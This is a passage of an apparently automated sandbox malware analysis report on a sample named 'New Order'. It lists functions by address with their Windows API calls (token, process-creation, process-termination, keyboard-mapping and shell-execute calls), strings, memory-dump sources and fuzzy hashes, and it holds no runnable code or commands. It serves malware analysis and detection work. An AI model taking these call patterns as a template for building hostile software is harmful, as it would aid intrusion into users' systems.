Part of subcall function 002C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C3A97,?,?,002C2E7F,?,?,?,00000000), ref: 002C3AC2

_wcslen.LIBCMT ref: 0033587B
CoInitialize.OLE32(00000000), ref: 00335995
CoCreateInstance.OLE32(0035FCF8,00000000,00000001,0035FB68,?), ref: 003359AE
CoUninitialize.OLE32 ref: 003359CC

Strings

.lnk, xrefs: 00335876, 003358C1, 00335985

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 8bdb0464cff6b3e15faf753c4d9122102490beae4db62b9de89945019b02411e
Instruction ID: de249923e458e2dff51d13574da4f3b157a8529362ab151f316585d9fad44cb0
Opcode Fuzzy Hash: 8bdb0464cff6b3e15faf753c4d9122102490beae4db62b9de89945019b02411e
Instruction Fuzzy Hash: B0D160716087019FC715DF24C880A2ABBE5EF89720F158A5DF88A9B361DB31ED45CF92

Function 0032175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00320FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00320FCA
Part of subcall function 00320FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00320FD6
Part of subcall function 00320FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00320FE5
Part of subcall function 00320FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00320FEC
Part of subcall function 00320FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00321002

GetLengthSid.ADVAPI32(?,00000000,00321335), ref: 003217AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 003217BA
HeapAlloc.KERNEL32(00000000), ref: 003217C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 003217DA
GetProcessHeap.KERNEL32(00000000,00000000,00321335), ref: 003217EE
HeapFree.KERNEL32(00000000), ref: 003217F5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 30049cc49c4264cee642f4caff9042d7a4e6f05106aa25fe782815ff5ae629d1
Instruction ID: 508248756f200d6eed648c0c56c7aa8594079cf780bf90f899ced9ab7ce337d8
Opcode Fuzzy Hash: 30049cc49c4264cee642f4caff9042d7a4e6f05106aa25fe782815ff5ae629d1
Instruction Fuzzy Hash: 6511BE31510715FFDB229FA8ED49BAF7BADEB9535AF104018F44197221C736AA44CBA0

Function 003214CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003214FF
OpenProcessToken.ADVAPI32(00000000), ref: 00321506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00321515
CloseHandle.KERNEL32(00000004), ref: 00321520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0032154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00321563

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 2718d4b6ae448c3efbacf04e513543668ca5b1e3f3f95ec5357c1dbd24cc653f
Instruction ID: ef53670869a5a56e853a9cb14f2dd84c41916746e590c4b55c96d057dc55c0aa
Opcode Fuzzy Hash: 2718d4b6ae448c3efbacf04e513543668ca5b1e3f3f95ec5357c1dbd24cc653f
Instruction Fuzzy Hash: 9D11477250020DAFDB128F98EE49BDA7BADEB48709F154054FA05A2060C375CE60DBA0

Function 002E3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,002E3379,002E2FE5), ref: 002E3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002E339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002E33B7
SetLastError.KERNEL32(00000000,?,002E3379,002E2FE5), ref: 002E3409

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5569dafdddd5ad6992b8531375cd0ab57f81ecdc3ff29c493ab840deed21886d
Instruction ID: ae1ed5ce3f352a28c25974ad9acb98c16f86adbf8f6784be07102b6b8f9d04e9
Opcode Fuzzy Hash: 5569dafdddd5ad6992b8531375cd0ab57f81ecdc3ff29c493ab840deed21886d
Instruction Fuzzy Hash: B201F9322B8352AED7176B777C8D9661B9CD7053BBBB00269F410831F0EF614D215A94

Function 002F2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,002F5686,00303CD6,?,00000000,?,002F5B6A,?,?,?,?,?,002EE6D1,?,00388A48), ref: 002F2D78
_free.LIBCMT ref: 002F2DAB
_free.LIBCMT ref: 002F2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,002EE6D1,?,00388A48,00000010,002C4F4A,?,?,00000000,00303CD6), ref: 002F2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,002EE6D1,?,00388A48,00000010,002C4F4A,?,?,00000000,00303CD6), ref: 002F2DEC
_abort.LIBCMT ref: 002F2DF2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 009d2a38695fa1184b71947f60d912fbc85693c6a508880cdcf2478a7fa7a011
Instruction ID: 17285df6720c35ed7ca8245a7c999d2201f320205adb9f4348729ba232e6a314
Opcode Fuzzy Hash: 009d2a38695fa1184b71947f60d912fbc85693c6a508880cdcf2478a7fa7a011
Instruction Fuzzy Hash: 5AF0F935575B0DEBC2132B34BC1AE3AA559AFC37E5F241035FB24921A2DE748C294920

Function 00358A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 002D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D9693
Part of subcall function 002D9639: SelectObject.GDI32(?,00000000), ref: 002D96A2
Part of subcall function 002D9639: BeginPath.GDI32(?), ref: 002D96B9
Part of subcall function 002D9639: SelectObject.GDI32(?,00000000), ref: 002D96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00358A4E
LineTo.GDI32(?,00000003,00000000), ref: 00358A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00358A70
LineTo.GDI32(?,00000000,00000003), ref: 00358A80
EndPath.GDI32(?), ref: 00358A90
StrokePath.GDI32(?), ref: 00358AA0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 1185f14367c870b9661f225c3c217f9fc47644fcc944dac84d09a3e09ca8569a
Instruction ID: df496bc9846974903360533f0983e36fe0901a1bae44e9093c21ee62d93d565f
Opcode Fuzzy Hash: 1185f14367c870b9661f225c3c217f9fc47644fcc944dac84d09a3e09ca8569a
Instruction Fuzzy Hash: 6811C976010249FFDB129F94DC88EAA7F6DEB08395F048012BA199A1B1C7729D55DFA0

Function 003251FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00325218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00325229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00325230
ReleaseDC.USER32(00000000,00000000), ref: 00325238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0032524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00325261

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9fe68e90da04c09ed5722253a9e2a29e1680443e3046e18d2469b2dbce7b3f76
Instruction ID: 9b06d49d17a81432354f6b5cdba07b77fc13608482088fe1d3864e49e1a3081d
Opcode Fuzzy Hash: 9fe68e90da04c09ed5722253a9e2a29e1680443e3046e18d2469b2dbce7b3f76
Instruction Fuzzy Hash: EC018B75A01718BFEB119BA69C49A4EBFB8EB48752F044065FA04AB291DA709900CBA0

Function 002C1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 002C1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 002C1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002C1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 002C1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 002C1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 002C1C22

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: bf10e1473a6018996876d423c11171f114720df3b9e07e8e0061ba277ade42e8
Instruction ID: f41f9a27989bca796f565acc1c8a30e68be8da6b3111ec07c435698c3f364a20
Opcode Fuzzy Hash: bf10e1473a6018996876d423c11171f114720df3b9e07e8e0061ba277ade42e8
Instruction Fuzzy Hash: 220167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C4BA42C7F5A864CBE5

Function 0032EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0032EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0032EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0032EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0032EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0032EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0032EB75

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: fbc3bb4fed9d40c74f57b05a6db5c5081ca612ca6f52c17e54dea11d609dbb4c
Instruction ID: 848f2fdd6588be775df7d70cf2b162aefe1c7a4c5731a5fbf45cf35eb1b6d2c5
Opcode Fuzzy Hash: fbc3bb4fed9d40c74f57b05a6db5c5081ca612ca6f52c17e54dea11d609dbb4c
Instruction Fuzzy Hash: B6F01772250758BFE6225B629C0EEAB7A7CEBCAB1AF001158F601D11A196A05B0186B5

Function 00317439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00317452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00317469
GetWindowDC.USER32(?), ref: 00317475
GetPixel.GDI32(00000000,?,?), ref: 00317484
ReleaseDC.USER32(?,00000000), ref: 00317496
GetSysColor.USER32(00000005), ref: 003174B0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 4de64bad2e0f3b6ab071cdfdc1a9c649e8e00585e60ef15a17dbfef0ce62a912
Instruction ID: e6bdff89e9cb8c0aa3083bb30c6101908e75ba3563bc5275b8507e68dcec889d
Opcode Fuzzy Hash: 4de64bad2e0f3b6ab071cdfdc1a9c649e8e00585e60ef15a17dbfef0ce62a912
Instruction Fuzzy Hash: 91017831410305EFEB125FA5DC48BEA7BB9FB08316F191060F916A21B0CB311E91EB10

Function 00321874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0032187F
UnloadUserProfile.USERENV(?,?), ref: 0032188B
CloseHandle.KERNEL32(?), ref: 00321894
CloseHandle.KERNEL32(?), ref: 0032189C
GetProcessHeap.KERNEL32(00000000,?), ref: 003218A5
HeapFree.KERNEL32(00000000), ref: 003218AC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 4fc1af904026413ad11b867ee0dd1c58d0e82839032e51fb4ff153111ed43859
Instruction ID: 373c6161124facf2b6455bd94d3706fd3d234f7d21bde92c91b3cb7a01bd9d2b
Opcode Fuzzy Hash: 4fc1af904026413ad11b867ee0dd1c58d0e82839032e51fb4ff153111ed43859
Instruction Fuzzy Hash: 2BE0C236014705BFDA025BA1ED0C90ABB6DFB49B26B109220F22681470CB32A4A0DB90

Function 002CBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002CBEB3

Strings

D%9, xrefs: 002CBDED, 002CBD91, 002CBD1B
D%9, xrefs: 002CBE9A
D%9D%9, xrefs: 002CBCA5
D%9, xrefs: 002CBCA2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%9$D%9$D%9$D%9D%9
API String ID: 1385522511-1166131560
Opcode ID: 4ea9261c5dcae0c0b43acf513effe5744ebbec9dacc4d7a52c9079c0f294c2cd
Instruction ID: 28b48d5ab24a73301c468553943591dbd45fa3e2b077e0f3214fe093026169ab
Opcode Fuzzy Hash: 4ea9261c5dcae0c0b43acf513effe5744ebbec9dacc4d7a52c9079c0f294c2cd
Instruction Fuzzy Hash: 0C916B75A1020ADFCB19CF59C092AAAB7F1FF59310F20426ED946AB350D771AE91CF90

Function 00347B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 002E0242: EnterCriticalSection.KERNEL32(0039070C,00391884,?,?,002D198B,00392518,?,?,?,002C12F9,00000000), ref: 002E024D
Part of subcall function 002E0242: LeaveCriticalSection.KERNEL32(0039070C,?,002D198B,00392518,?,?,?,002C12F9,00000000), ref: 002E028A

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 002E00A3: __onexit.LIBCMT ref: 002E00A9

__Init_thread_footer.LIBCMT ref: 00347BFB

Part of subcall function 002E01F8: EnterCriticalSection.KERNEL32(0039070C,?,?,002D8747,00392514), ref: 002E0202
Part of subcall function 002E01F8: LeaveCriticalSection.KERNEL32(0039070C,?,002D8747,00392514), ref: 002E0235

Strings

G, xrefs: 00347C7F
Variable must be of type 'Object'., xrefs: 00347C3A
+T1, xrefs: 00347E2E
5, xrefs: 00347C78

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T1$5$G$Variable must be of type 'Object'.
API String ID: 535116098-2785345629
Opcode ID: 795ce21ecaaa146a1aca1ef063b22b42fd7c2563cca19758091cb617f93b459b
Instruction ID: 6328b53e0bbd8274161ac92d706e74877cc4dc10087d37c74afc09a5b7ccee84
Opcode Fuzzy Hash: 795ce21ecaaa146a1aca1ef063b22b42fd7c2563cca19758091cb617f93b459b
Instruction Fuzzy Hash: 0F919974A14209AFCB16EF94D891DADB7F5FF49304F108059F806AF2A2DB71AE85CB50

Function 0032C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002C7620: _wcslen.LIBCMT ref: 002C7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0032C6EE
_wcslen.LIBCMT ref: 0032C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0032C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0032C7CA

Strings

0, xrefs: 0032C6AF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 047a5bc74509cfff4bce621e2484c43bdbe65207278a4fd5235881dd6360ebfe
Instruction ID: ab2c720206706b462535a902771fabac394b30d2c0721aca8df2867d3863f0d0
Opcode Fuzzy Hash: 047a5bc74509cfff4bce621e2484c43bdbe65207278a4fd5235881dd6360ebfe
Instruction Fuzzy Hash: 1351DE716243219FD7169F28E884B6EB7E8AF49314F042A2DF995E31A0DB70DD04CF92

Function 0034AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0034AEA3

Part of subcall function 002C7620: _wcslen.LIBCMT ref: 002C7625

GetProcessId.KERNEL32(00000000), ref: 0034AF38
CloseHandle.KERNEL32(00000000), ref: 0034AF67

Strings

<, xrefs: 0034AE6B
@, xrefs: 0034AE72

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: e36a9c090f51c80bb195d3e7255bdcacbc3d15f1126a6ab3e8b088f6e2724e41
Instruction ID: 8520ce8ecbf0e99c8e93a42a77c30ed3cf984542703f27e91bc0faa5159f0cda
Opcode Fuzzy Hash: e36a9c090f51c80bb195d3e7255bdcacbc3d15f1126a6ab3e8b088f6e2724e41
Instruction Fuzzy Hash: 0B716670A10619DFCB15DF54C884A9EBBF4AF08304F05859DE816AB362CB74ED95CF91

Function 0032719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00327206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0032723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0032724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003272CF

Strings

DllGetClassObject, xrefs: 00327242

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: da6848896c6e0b32f1129f87b55ee661e9e4e1e49e41a424c37534245eb6369f
Instruction ID: 7477e7171da0ebc8e970c7f1cea26928ba3c8a6450a10949961f426cf4b73dc3
Opcode Fuzzy Hash: da6848896c6e0b32f1129f87b55ee661e9e4e1e49e41a424c37534245eb6369f
